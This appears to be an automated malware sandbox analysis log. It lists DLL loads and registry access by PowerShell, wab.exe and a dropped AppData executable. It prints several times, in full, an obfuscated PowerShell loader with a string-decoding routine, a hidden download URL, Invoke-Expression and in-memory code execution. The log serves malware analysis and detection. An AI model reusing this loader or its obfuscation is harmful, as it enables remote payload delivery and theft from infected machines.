              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeSection loaded: cryptdlg.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeSection loaded: msoert2.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeSection loaded: msimg32.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeSection loaded: cryptui.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeSection loaded: msftedit.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeSection loaded: explorerframe.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeSection loaded: actxprxy.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeSection loaded: cryptdlg.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeSection loaded: msoert2.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeSection loaded: msimg32.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeSection loaded: cryptui.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeSection loaded: msftedit.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeSection loaded: explorerframe.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeFile opened: C:\Windows\SysWOW64\msftedit.dllJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000014.00000002.2906407950.0000000000473000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000014.00000002.2918369261.0000000007DE0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: stem.Core.pdb source: powershell.exe, 00000014.00000002.2918369261.0000000007DE0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wab.pdbGCTL source: fMNDB.exe, 00000018.00000000.3022571717.0000000000161000.00000020.00000001.01000000.00000009.sdmp
              Source: Binary string: wab.pdb source: fMNDB.exe, fMNDB.exe, 00000018.00000000.3022571717.0000000000161000.00000020.00000001.01000000.00000009.sdmp

              Data Obfuscation

              barindex
              Source: Yara matchFile source: 00000014.00000002.2919733703.00000000096F5000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.2919321134.0000000008200000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.2912764832.00000000056CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.3176265994.0000016B68565000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Nynazistens)$global:Unobumbrated = [System.Text.Encoding]::ASCII.GetString($Myxomycete)$global:Vildtjagternes=$Unobumbrated.substring($Amebae,$Klokker)<#Prparat sbeboblens trichloret
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Ensidigheden $comoedus $Ded), (Societyet @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Multifidly = [AppDomain]::CurrentDomain.GetAssemblies()$global:Ren
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Snerydningen)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Skjaldedigtningerne, $false).DefineType($Sto
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Nynazistens)$global:Unobumbrated = [System.Text.Encoding]::ASCII.GetString($Myxomycete)$global:Vildtjagternes=$Unobumbrated.substring($Amebae,$Klokker)<#Prparat sbeboblens trichloret
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe';If (${host}.CurrentCulture) {$suballocating++;}Function Stemmetllerens($Tegningsfil){$Gearskifter=$Tegningsfil.Length-$suballocating;$Cordaitaleannitielt96='SUBsTRI';$Cordaitaleannitielt96+='ng';For( $Cordaitalean=2;$Cordaitalean -lt $Gearskifter;$Cordaitalean+=3){$Kalyptras+=$Tegningsfil.$Cordaitaleannitielt96.Invoke( $Cordaitalean, $suballocating);}$Kalyptras;}function Pharmacist($Unmicaceous){ & ($Breakneck) ($Unmicaceous);}$Banjernes=Stemmetllerens 'ThMFaoUnzMii ClMulHeas / a5Fi.,a0 C la(suWS.iAgnPaddio ,w TsPa ,eNHoTJ Op1Su0H,.A,0.w;Go KWPii BnAl6 B4,n;Co ,yx,e6 E4E.;Ds Tir Gv a: A1Ca2S,1.i.Ar0Mu) R S,GLieGicSpk AoR /I,2 S0P 1Ek0Ti0.n1Az0Sk1,e GrFUril rreeJ f EoDaxT /Sa1An2Fa1 .Pa0 l ';$Forgelser=Stemmetllerens 'PoU HsK,eElrPl- TAGeg,leHvnO.t H ';$Spytslikkeren=Stemmetllerens 'AuhMatWat Op,us W:Ko/Bi/Bedt.rNyi ,vDoePr.SugEpoBeo PgMilSle D.,hc WoM mPr/.au Pc B? neL.x epNooB.r BtPh=Dod.koShwSen,alBeo Da Sd a&A,ia,d u=D 1.alUnB ._UbMBypSkg ,j -,iWSuW.ye RK,eK XAaPLoO .EGrBubmOuL .yN.iBrKba3,rMS SSwcW OD,b ,2P.ySvdPe ';$Misevaluate=Stemmetllerens 'Ar> P ';$Breakneck=Stemmetllerens ',niVieTux.o ';$Hardbeam='dokumentnavne';$Wienerbrdsstang = Stemmetllerens 'ale FcM,hEuo K .a%Isa ap TpEfdPraFotJoaVa%Sy\SqV eeA iMen.alGee asHosT..OmD SiY,s G Jo&Sp&Gi PneBucSthKaoDd S t , ';Pharmacist (Stemmetllerens ' $ CgOblProFob SaUflMa:C.U dEusAmkR,rBoiArfBit FsTys bi .dTne Urs n e sUn= P(UncStmFodKl .k/,ecKo Gr$,hW Si .eSknB,eNorBlb BrUnd AsExs rt .aF.nS gF.)U. ');Pharmacist (Stemmetllerens 'Ch$ egz lF oTub.laMal,a:ShPS.oGarPasNoeThsP n FamopRes,s=,a$,nSNopheyG tEus.ulStiVrk .k neH rToeA.nRa. SsT.pUnlHyiShtKu(Fo$DiMDeiD,sPae evSba RlStu PaI t eSl) n ');Pharmacist (Stemmetllerens 'Ta[HoN ,e.otPr. SHiererL.vOvi,ocmiep,P IoFliRen mtViM .aLenTraN,g Fe SrV,]Wa:Ma:ErS Le Dc Du rn.iS,tLoy FPcar,aoKet.oo ,c AoUnlC. S =Ae P,[EgNFoe .t ..FoS ,e,ncStu or Pi,ntSty,iPTrrSuo ftEnoUncBeo.plPiT iy Bpraepr]U :Fr: TT,alAesSl1 B2 w ');$Spytslikkeren=$Porsesnaps[0];$Landbrugsbygningen= (Stemmetllerens 'Ho$ragStl,uoP.bH aS l ,: HbLaa .dT.eSmhUnt Pt ,e urWanRfe as.e=PrNSoeSuwSi-VrORebArja.eBacUdtVa K.SovyRus FtA,eAemK..VeN ,e ,tCy.C,WBeeBlbSuC,nlFeiS,eFln rt');$Landbrugsbygningen+=$Udskriftssidernes[1];Pharmacist ($Landbrugsbygn
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe';If (${host}.CurrentCulture) {$suballocating++;}Function Stemmetllerens($Tegningsfil){$Gearskifter=$Tegningsfil.Length-$suballocating;$Cordaitaleannitielt96='SUBsTRI';$Cordaitaleannitielt96+='ng';For( $Cordaitalean=2;$Cordaitalean -lt $Gearskifter;$Cordaitalean+=3){$Kalyptras+=$Tegningsfil.$Cordaitaleannitielt96.Invoke( $Cordaitalean, $suballocating);}$Kalyptras;}function Pharmacist($Unmicaceous){ & ($Breakneck) ($Unmicaceous);}$Banjernes=Stemmetllerens 'ThMFaoUnzMii ClMulHeas / a5Fi.,a0 C la(suWS.iAgnPaddio ,w TsPa ,eNHoTJ Op1Su0H,.A,0.w;Go KWPii BnAl6 B4,n;Co ,yx,e6 E4E.;Ds Tir Gv a: A1Ca2S,1.i.Ar0Mu) R S,GLieGicSpk AoR /I,2 S0P 1Ek0Ti0.n1Az0Sk1,e GrFUril rreeJ f EoDaxT /Sa1An2Fa1 .Pa0 l ';$Forgelser=Stemmetllerens 'PoU HsK,eElrPl- TAGeg,leHvnO.t H ';$Spytslikkeren=Stemmetllerens 'AuhMatWat Op,us W:Ko/Bi/Bedt.rNyi ,vDoePr.SugEpoBeo PgMilSle D.,hc WoM mPr/.au Pc B? neL.x epNooB.r BtPh=Dod.koShwSen,alBeo Da Sd a&A,ia,d u=D 1.alUnB ._UbMBypSkg ,j -,iWSuW.ye RK,eK XAaPLoO .EGrBubmOuL .yN.iBrKba3,rMS SSwcW OD,b ,2P.ySvdPe ';$Misevaluate=Stemmetllerens 'Ar> P ';$Breakneck=Stemmetllerens ',niVieTux.o ';$Hardbeam='dokumentnavne';$Wienerbrdsstang = Stemmetllerens 'ale FcM,hEuo K .a%Isa ap TpEfdPraFotJoaVa%Sy\SqV eeA iMen.alGee asHosT..OmD SiY,s G Jo&Sp&Gi PneBucSthKaoDd S t , ';Pharmacist (Stemmetllerens ' $ CgOblProFob SaUflMa:C.U dEusAmkR,rBoiArfBit FsTys bi .dTne Urs n e sUn= P(UncStmFodKl .k/,ecKo Gr$,hW Si .eSknB,eNorBlb BrUnd AsExs rt .aF.nS gF.)U. ');Pharmacist (Stemmetllerens 'Ch$ egz lF oTub.laMal,a:ShPS.oGarPasNoeThsP n FamopRes,s=,a$,nSNopheyG tEus.ulStiVrk .k neH rToeA.nRa. SsT.pUnlHyiShtKu(Fo$DiMDeiD,sPae evSba RlStu PaI t eSl) n ');Pharmacist (Stemmetllerens 'Ta[HoN ,e.otPr. SHiererL.vOvi,ocmiep,P IoFliRen mtViM .aLenTraN,g Fe SrV,]Wa:Ma:ErS Le Dc Du rn.iS,tLoy FPcar,aoKet.oo ,c AoUnlC. S =Ae P,[EgNFoe .t ..FoS ,e,ncStu or Pi,ntSty,iPTrrSuo ftEnoUncBeo.plPiT iy Bpraepr]U :Fr: TT,alAesSl1 B2 w ');$Spytslikkeren=$Porsesnaps[0];$Landbrugsbygningen= (Stemmetllerens 'Ho$ragStl,uoP.bH aS l ,: HbLaa .dT.eSmhUnt Pt ,e urWanRfe as.e=PrNSoeSuwSi-VrORebArja.eBacUdtVa K.SovyRus FtA,eAemK..VeN ,e ,tCy.C,WBeeBlbSuC,nlFeiS,eFln rt');$Landbrugsbygningen+=$Udskriftssidernes[1];Pharmacist ($Landbrugsbygn
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe';If (${host}.CurrentCulture) {$suballocating++;}Function Stemmetllerens($Tegningsfil){$Gearskifter=$Tegningsfil.Length-$suballocating;$Cordaitaleannitielt96='SUBsTRI';$Cordaitaleannitielt96+='ng';For( $Cordaitalean=2;$Cordaitalean -lt $Gearskifter;$Cordaitalean+=3){$Kalyptras+=$Tegningsfil.$Cordaitaleannitielt96.Invoke( $Cordaitalean, $suballocating);}$Kalyptras;}function Pharmacist($Unmicaceous){ & ($Breakneck) ($Unmicaceous);}$Banjernes=Stemmetllerens 'ThMFaoUnzMii ClMulHeas / a5Fi.,a0 C la(suWS.iAgnPaddio ,w TsPa ,eNHoTJ Op1Su0H,.A,0.w;Go KWPii BnAl6 B4,n;Co ,yx,e6 E4E.;Ds Tir Gv a: A1Ca2S,1.i.Ar0Mu) R S,GLieGicSpk AoR /I,2 S0P 1Ek0Ti0.n1Az0Sk1,e GrFUril rreeJ f EoDaxT /Sa1An2Fa1 .Pa0 l ';$Forgelser=Stemmetllerens 'PoU HsK,eElrPl- TAGeg,leHvnO.t H ';$Spytslikkeren=Stemmetllerens 'AuhMatWat Op,us W:Ko/Bi/Bedt.rNyi ,vDoePr.SugEpoBeo PgMilSle D.,hc WoM mPr/.au Pc B? neL.x epNooB.r BtPh=Dod.koShwSen,alBeo Da Sd a&A,ia,d u=D 1.alUnB ._UbMBypSkg ,j -,iWSuW.ye RK,eK XAaPLoO .EGrBubmOuL .yN.iBrKba3,rMS SSwcW OD,b ,2P.ySvdPe ';$Misevaluate=Stemmetllerens 'Ar> P ';$Breakneck=Stemmetllerens ',niVieTux.o ';$Hardbeam='dokumentnavne';$Wienerbrdsstang = Stemmetllerens 'ale FcM,hEuo K .a%Isa ap TpEfdPraFotJoaVa%Sy\SqV eeA iMen.alGee asHosT..OmD SiY,s G Jo&Sp&Gi PneBucSthKaoDd S t , ';Pharmacist (Stemmetllerens ' $ CgOblProFob SaUflMa:C.U dEusAmkR,rBoiArfBit FsTys bi .dTne Urs n e sUn= P(UncStmFodKl .k/,ecKo Gr$,hW Si .eSknB,eNorBlb BrUnd AsExs rt .aF.nS gF.)U. ');Pharmacist (Stemmetllerens 'Ch$ egz lF oTub.laMal,a:ShPS.oGarPasNoeThsP n FamopRes,s=,a$,nSNopheyG tEus.ulStiVrk .k neH rToeA.nRa. SsT.pUnlHyiShtKu(Fo$DiMDeiD,sPae evSba RlStu PaI t eSl) n ');Pharmacist (Stemmetllerens 'Ta[HoN ,e.otPr. SHiererL.vOvi,ocmiep,P IoFliRen mtViM .aLenTraN,g Fe SrV,]Wa:Ma:ErS Le Dc Du rn.iS,tLoy FPcar,aoKet.oo ,c AoUnlC. S =Ae P,[EgNFoe .t ..FoS ,e,ncStu or Pi,ntSty,iPTrrSuo ftEnoUncBeo.plPiT iy Bpraepr]U 